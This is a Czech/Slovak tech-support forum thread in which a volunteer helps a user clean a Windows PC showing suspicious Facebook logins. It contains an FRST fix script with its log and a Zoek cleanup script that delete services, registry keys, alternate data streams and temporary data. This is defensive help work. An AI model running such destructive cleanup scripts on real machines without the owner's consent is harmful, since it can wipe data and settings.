Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
C:\Program Files (x86)\8iq24splw1.dat
C:\Users\John\AppData\Roaming\changzhi_leidian.data
ContextMenuHandlers1: [GDContextMenu] -> [CC]{BB02B294-8425-42E5-983F-41A1FA970CD6} => -> No File
ContextMenuHandlers1: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers4: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers1_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
ContextMenuHandlers6_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
AlternateDataStreams: C:\Windows\system32\-1.14-windows.xml:B72225CA78 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0:74DBE02D40 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0:23D10F59A6 [10]
AlternateDataStreams: C:\Windows\system32\AcpiServiceVnA64.dll:ECA79956BD [10]
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [10]
AlternateDataStreams: C:\ProgramData\ReclaiMe.config:AC4DBEED78 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk:8ACB4E955C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk:D8006AA692 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk:0E0659E205 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk:37833A1060 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk:38307C6C28 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk:DAEDFEEC9C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk:742FE07988 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk:6306D2B3A2 [10]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [83]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [2716]
FirewallRules: [{381E8692-D05F-4768-A03E-BFB42D82C8D3}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{030F7113-6734-41CD-A4E5-D34B67B56903}] => (Block) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [{5990ECB6-4B3B-4441-A614-264DCBBF16F2}] => (Allow) I:\windows programy\davinci\ElementsPanelDaemon.exe => No File
FirewallRules: [{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}] => (Allow) I:\windows programy\davinci\OxygenPanelDaemon.exe => No File
FirewallRules: [{257BE348-CCF6-4567-A911-19F0393770BC}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => No File

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully

"C:\Windows\system32\GroupPolicy\Machine" folder move:

C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AC5DCEC8-7ADC-420A-928F-2E4D77508D8B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AC5DCEC8-7ADC-420A-928F-2E4D77508D8B}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{795E77E3-0EEC-4504-9D64-C02F56BB6298}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{795E77E3-0EEC-4504-9D64-C02F56BB6298}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E1303010-25DC-4FEC-9EBE-33A7E35BB7B3}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1303010-25DC-4FEC-9EBE-33A7E35BB7B3}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\VisualStudio\Updates\BackgroundDownload" => removed successfully
HKLM\System\CurrentControlSet\Services\qmeyutfnfe => removed successfully
qmeyutfnfe => service removed successfully
HKLM\System\CurrentControlSet\Services\rxyfbwoazs => removed successfully
rxyfbwoazs => service removed successfully
HKLM\System\CurrentControlSet\Services\USBAAPL64 => removed successfully
USBAAPL64 => service removed successfully
HKLM\System\CurrentControlSet\Services\xhunter1 => removed successfully
xhunter1 => service removed successfully
HKLM\System\CurrentControlSet\Services\cqwzjpilmi => removed successfully
cqwzjpilmi => service removed successfully
HKLM\System\CurrentControlSet\Services\Mac606 => removed successfully
Mac606 => service removed successfully
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}" => not found
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}" => not found
C:\Program Files (x86)\8iq24splw1.dat => moved successfully
C:\Users\John\AppData\Roaming\changzhi_leidian.data => moved successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\GDContextMenu => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\GpgEX => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\GpgEX => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\Software\Classes\*\ShellEx\ContextMenuHandlers\CloudStation.SyncFolderContextMenu => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Classes\CLSID\{2C4A5D61-009C-4561-9A33-6AFD542FD237} => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\Software\Classes\Folder\ShellEx\ContextMenuHandlers\CloudStation.SyncFolderContextMenu => removed successfully
C:\Windows\system32\-1.14-windows.xml => ":B72225CA78" ADS removed successfully
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 => ":74DBE02D40" ADS removed successfully
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 => ":23D10F59A6" ADS removed successfully
C:\Windows\system32\AcpiServiceVnA64.dll => ":ECA79956BD" ADS removed successfully
C:\ProgramData\DP45977C.lfl => ":677104FCAA" ADS removed successfully
C:\ProgramData\ReclaiMe.config => ":AC4DBEED78" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk => ":8ACB4E955C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk => ":D8006AA692" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk => ":0E0659E205" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk => ":37833A1060" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk => ":38307C6C28" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk => ":7661CCE9BF" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk => ":DAEDFEEC9C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk => ":742FE07988" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk => ":6306D2B3A2" ADS removed successfully
C:\Users\John\Desktop\normal paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\normal paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\obrazok full.bmp => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\obrazok full.bmp => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\scaner.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\scaner.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\trident paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\trident paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\Public\DRM => ":احتضان" ADS removed successfully
C:\Users\Public\Shared Files => ":VersionCache" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{381E8692-D05F-4768-A03E-BFB42D82C8D3}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{030F7113-6734-41CD-A4E5-D34B67B56903}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5990ECB6-4B3B-4441-A614-264DCBBF16F2}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{257BE348-CCF6-4567-A911-19F0393770BC}" => removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

FlushDNS => completed
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 75007194 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 611453322 B
Windows/system/drivers => 363314582 B
Edge => 0 B
Chrome => 353424969 B
Firefox => 116041466 B
Opera => 165074806 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 128 B
NetworkService => 836984 B
John => 64055413552 B
Test => 64074968159 B

RecycleBin => 467863419 B
EmptyTemp: => 121.3 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 10:18:25 ====

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 18 úno 2024 11:05
od Rudy
Smazáno. Nastala nějaká změna?

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 18 úno 2024 12:37
od mivefe5888
Skusil som sa znova prihlasit na FB a po chvili mi znova doslo upozornenie ze sa tam niekto prihlasil a musim zmenit heslo, takze ziadna zmena

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 18 úno 2024 15:19
od Rudy
Mně to chodí také. Jenže vím, že jsem to já. Už jsem to reklamoval, ovšem FB nic. Nwejste to vy sám?

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 19 úno 2024 19:53
od mivefe5888
Nakolko mi tam pise ze prihlasenie bolo z Chrome pre Windows 10, a deje sa to iba ked sa prihlasim cez svoj PC, kedy pouzivam operu a mam windows 7, tak ja sam to nebudem a ani si nemyslim ze by to bola chyba facebooku, kedze na notebooku sa mozem prihlasit bez problemov a ziadny problem, zaroven pouzivam rovnaky PC uz niekolko rokov.

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 19 úno 2024 20:00
od Rudy
Tak to asi ne. Mně chodí maily, kde je uveden stejný čas, jako když se tam přihlašuji já, stejný prohlížeč a stejný oper. systém. Můžeme ještě provést vyčištění prohlížečů:

Spusťte postupně tyto utility:


1. 1. Stahnete Zoek.exe https://www.edisk.cz/stahni/21334/zoek.rar_1.3MB.html/ a ulozte jej na plochu

Pokud pouzivate Win Vista ci W7, kliknete na Zoek pravym a dejte Run As Administrator ci Spustit jako spravce
Do okna vlozte skript nize




autoclean;
resethosts;
emptyclsid;
IEdefaults;
FFdefaults;
CHRdefaults;
emptyIEcache;
emptyFFcache;
emptyCHRcache;
emptyalltemp;
emptyflash;
emptyjava;
emptyrecycle.bin;





Nasledne kliknete na Run Script
PC provede opravu, restartuje se a da Vam log, jeho obsah vlozte sem.

a

2. Junkware removal tool: https://www.stahuj.cz/utility_a_ostatni ... oval-tool/
•Ulozte nejlepe na plochu
•Po spusteni se zobrazi licencni podminky, stisknete libovolnou klavesu
•Probehne vytvoreni zalohy a nasledne prohledavani
•Probehne skenovani a pak se objevi log, pripadne bude ulozen v c:\JRT jako JRT.txt, ten sem vlozte.
Všechny časy jsou v UTC+01:00
Stránka 1 z 1

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz